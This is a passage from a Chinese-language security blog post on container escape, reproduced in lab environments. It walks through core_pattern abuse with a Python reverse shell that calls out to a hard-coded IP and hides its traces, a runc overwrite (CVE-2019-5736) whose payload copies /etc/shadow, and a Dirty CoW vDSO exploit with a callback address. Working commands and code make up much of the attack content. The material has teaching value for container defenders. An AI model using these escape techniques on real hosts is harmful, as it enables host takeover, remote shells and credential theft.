<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">echo</span> -e <span class="s2">&#34;|/var/lib/docker/overlay2/c7c07b405792a4da3db07f22ae42a35ad00c8946362f0ebe7687bea79785add8/merged/tmp/.x.py \rcore           &#34;</span> &gt; /host-proc/sys/kernel/core_pattern
</span></span></code></pre></td></tr></table>
</div>
</div><p>然后在容器内创建一个反弹 shell 的 <code>/tmp/.x.py</code>：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">cat</span> <span class="o">&gt;/</span><span class="n">tmp</span><span class="o">/.</span><span class="n">x</span><span class="o">.</span><span class="n">py</span> <span class="o">&lt;&lt;</span> <span class="n">EOF</span>
</span></span><span class="line"><span class="cl"><span class="c1">#!/usr/bin/python</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">pty</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl"><span class="n">lhost</span> <span class="o">=</span> <span class="s2">&#34;101.32.10.105&#34;</span>
</span></span><span class="line"><span class="cl"><span class="n">lport</span> <span class="o">=</span> <span class="mi">9999</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">lhost</span><span class="p">,</span> <span class="n">lport</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span> <span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span> <span class="mi">2</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">os</span><span class="o">.</span><span class="n">putenv</span><span class="p">(</span><span class="s2">&#34;HISTFILE&#34;</span><span class="p">,</span> <span class="s1">&#39;/dev/null&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">pty</span><span class="o">.</span><span class="n">spawn</span><span class="p">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="s1">&#39;/tmp/.x.py&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="n">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">EOF</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">chmod</span> <span class="o">+</span><span class="n">x</span> <span class="o">/</span><span class="n">tmp</span><span class="o">/.</span><span class="n">x</span><span class="o">.</span><span class="n">py</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>最后，在容器内运行一个可以崩溃的程序即可，例如：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp"></span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="o">*</span><span class="n">a</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="n">a</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>容器内若没有编译器，可以先在其他机器上编译好后放入容器中。</p>
<p>完成后，在其他机器上开启 shell 监听：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ncat -lvnp <span class="m">9999</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>接着在容器内执行上述编译好的崩溃程序，即可获得反弹 shell。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638548.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638548.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638548.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638548.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638548.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638548.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638511.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638511.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638511.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638511.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638511.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121638511.png-water_print" /></p>
<p>利用 CDK 工具：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./cdk run mount-procfs /mnt/host_proc <span class="s2">&#34;touch /tmp/exp-success&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="4-相关程序漏洞导致的容器逃逸">4 相关程序漏洞导致的容器逃逸</h2>
<h3 id="41-cve-2019-5736">4.1 CVE-2019-5736</h3>
<p>影响版本：<code>Docker version &lt;= 18.09.2</code> &amp; <code>RunC version &lt;= 1.0-rc6</code></p>
<h4 id="411-原理">4.1.1 原理</h4>
<p>CVE-2019-5736 一个能够覆盖宿主机 runc 程序的容器逃逸漏洞。</p>
<p>在执行功能类似于 <code>docker exec</code> 等命令时，底层实际上是容器运行时在操作。例如 runC，相应地，<code>runc exec</code> 命令会被执行。它的最终效果是在容器内部执行用户指定的程序。进一步讲，就是在容器的各种命名空间内，受到各种限制（如 Cgroups）的情况下，启动一个进程。除此以外，这个操作与在宿主机上执行一个程序并无二致。</p>
<p>执行过程大体如下：runC 启动并加入到容器的命名空间，接着以自身 (<code>/proc/self/</code>
<code>exe</code>）为范本启动一个子进程，最后通过 exec 系统调用执行用户指定的二进制程序。</p>
<p>proc 伪文件系统，即 /proc。关于这个概念，这里我们主要关注 proc 下的两类文件：</p>
<ul>
<li><code>/proc/[PID]/exe</code>：它是一种特殊的符号链接，又被称为 <code>magic links</code>， 指向进程自身
对应的本地程序文件（例如我们执行 <code>ls /proc/[ls-PID]/exe</code> 就指向 <code>/bin/ls</code>)。</li>
<li><code>/proc/[PID]/fd/</code>：这个目录下包含了进程打开的所有文件描述符。</li>
</ul>
<p><code>/proc/[PID]/exe</code> 的特殊之处在于，当打开这个文件时，在权限检查通过的情况下，内核将
直接返回一个指向该文件的描述符，而非按照传统的打开方式做路径解析和文件查找。这样
一来，它实际上绕过了 mnt 命名空间及 chroot 机制对一个进程能够访问到的文件路径的限制。</p>
<p>那么，设想如下攻击场景：在 <code>runc exec</code> 加入到容器的命名空间之后，容器内进程已经能够
通过内部 <code>/proc</code> 观察到它，此时如果打开 <code>/proc/runc-[PID]/exe</code> 并写入一些内容，就能够实现
将宿主机上的 runc 二进制程序覆盖掉。这样一来，下一次用户调用 runc 来执行命令时，实
际执行的将是攻击者放置的指令。</p>
<p>在存在漏洞的容器环境内，上述思路是可行的，但是攻击者想要在容器内实现宿主机
上的代码执行（逃逸)，还需要突破两个限制：</p>
<ol>
<li>用户权限限制，需要具有容器内部 root 权限。</li>
<li>Linux 不允许修改正在运行的进程对应的本地二进制文件。</li>
</ol>
<p>事实上，很多容器就是以 root 身份启动服务的。</p>
<p>攻击步骤：</p>
<ul>
<li>将容器内的 <code>/bin/sh</code> 程序覆盖为 <code>#!/proc/self/exe</code>。</li>
<li>持续遍历容器内 <code>/proc</code> 目录，读取每一个<code>/proc/[PID]/cmdline</code>，对 runc 做字符串
匹配，直到找到 runc 进程号。</li>
<li>以只读方式打开 <code>/proc/[runc-PID]/exe</code>，拿到文件描述符 fd。</li>
<li>持续尝试以写方式打开第 3 步中获得的只读 fd (<code>/proc/self/fd/[fd]</code>)，一开始总是返回失败，直到 runc 结束占用后写方式打开成功，立即通过该 fd 向宿主机上的 <code>/usr/bin/runc</code>，(名字也可能是 <code>/usr/bin/docker/runc</code>）写入攻击载荷</li>
<li>runc 最后将执行用户通过 <code>docker exec</code> 指定的 <code>/bin/sh</code>，它的内容在第 1 步中已经被替换成 <code>#/proc/self/exe</code>，因此实际上将执行宿主机上的 runc，而 runc 也已经在第 4 步中被覆盖掉了。</li>
</ul>
<h4 id="412-复现">4.1.2 复现</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./metarget cnv install cve-2019-5736
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131112041.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131112041.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131112041.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131112041.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131112041.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131112041.png-water_print" /></p>
<p><a href="https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go" target="_blank" rel="noopener noreffer">POC</a>：</p>
<p>payload 的内容：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-go" data-lang="go"><span class="line"><span class="cl"><span class="kd">var</span> <span class="nx">payload</span> <span class="p">=</span> <span class="s">&#34;#!/bin/bash \n cat /etc/shadow &gt; /tmp/shadow &amp;&amp; chmod 777 /tmp/shadow&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131119487.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131119487.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131119487.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131119487.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131119487.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131119487.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131121434.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131121434.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131121434.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131121434.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131121434.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111131121434.png-water_print" /></p>
<h2 id="5-内核漏洞导致的容器逃逸">5 内核漏洞导致的容器逃逸</h2>
<p>Linux 内核漏洞的危害之大、影响范围之广，使得它在各种攻防话题下都占据非常重要的一席。无论攻防场景怎样变化，我们对内核漏洞的利用往往都是从用户空间非法进入内核空间开始，到内核空间赋予当前或其他进程高权限后回到用户空间结束。</p>
<p>从操作系统层面来看，容器进程只是一种受到各种安全机制约束的进程，因此从攻防两端来看，容器逃逸都遵循传统的权限提升流程。攻击者可以凭借此特点拓展容器逃逸的思路，一旦有新的内核漏洞产生，就可以考虑它是否能够用于容器逃逸；而防守者则能够针对此特征进行防护和检测，如宿主机内核打补丁，或检查该内核漏洞利用有什么特点。</p>
<p>我们的关注点并非是内核漏洞，列举并剖析过多内核漏洞无益，但我们可以提出如下问题：为何内核漏洞能够用于容器逃逸，在具体实施过程中与内核漏洞用于传统权限提升有什么不同，在有了内核漏洞利用代码之后还需要做哪些工作才能实现容器逃逸。</p>
<h3 id="51-cve-2016-5195">5.1 CVE-2016-5195</h3>
<p>近年来，Linux 系统曝出过无数内核漏洞，其中能够用来提权的也不少，脏牛依赖于内存页的写时复制机制，该机制英文名称为 Copy-on-Write，再结合内存页特性，将漏洞命名为Dirty CoW，译为脏牛）大概是其中最有名气的漏洞之一。漏洞发现者甚至为其申请了专属域名（dirtycow.ninja），在笔者的印象中，上一个同样申请了域名的严重漏洞还是2014年的心脏滴血（CVE-2014-0160，heartbleed.com）。自这两个漏洞开始，越来越多的研究人员开始为他们发现的高危漏洞申请域名（尽管依然是极少数）。</p>
<p>关于脏牛漏洞的分析和利用文章早已遍布全网。这里我们使用来自 scumjr 的 <a href="https://github.com/scumjr/dirtycow-vdso" target="_blank" rel="noopener noreffer">PoC</a> 来完成容器逃逸。该利用的核心思路是向 vDSO 内写入 shellcode 并劫持正常函数的调用过程。</p>
<p>复现：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./metarget cnv install cve-2016-5195
</span></span><span class="line"><span class="cl">git clone https://github.com/gebl/dirtycow-docker-vdso.git
</span></span><span class="line"><span class="cl"><span class="nb">cd</span> dirtycow-docker-vdso/
</span></span><span class="line"><span class="cl">docker-compose run dirtycow /bin/bash
</span></span></code></pre></td></tr></table>
</div>
</div><p>进入容器，编译 POC：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">cd</span> /dirtycow-vdso/
</span></span><span class="line"><span class="cl">make
</span></span><span class="line"><span class="cl">./0xdeadbeef 192.168.172.136:1234
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="参考">参考</h2>
<ul>
<li>云原生安全——攻防实践与体系构建</li>
</ul>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2021-11-13</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2021/11/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8/" data-title="容器安全"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2021/11/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8/" data-title="容器安全"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2021/11/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8/" data-title="容器安全"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E4%BA%91%E5%8E%9F%E7%94%9F%E5%AE%89%E5%85%A8/">云原生安全</a>,&nbsp;<a href="/tags/docker/">Docker</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2021/10/docker%E6%A0%B8%E5%BF%83%E6%8A%80%E6%9C%AF/" class="prev" rel="prev" title="Docker 核心技术"><i class="fas fa-angle-left fa-fw"></i>Docker 核心技术</a>
            <a href="/2021/11/javascript%E5%8F%8D%E6%B7%B7%E6%B7%86/" class="next" rel="next" title="JavaScript 反混淆">JavaScript 反混淆<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
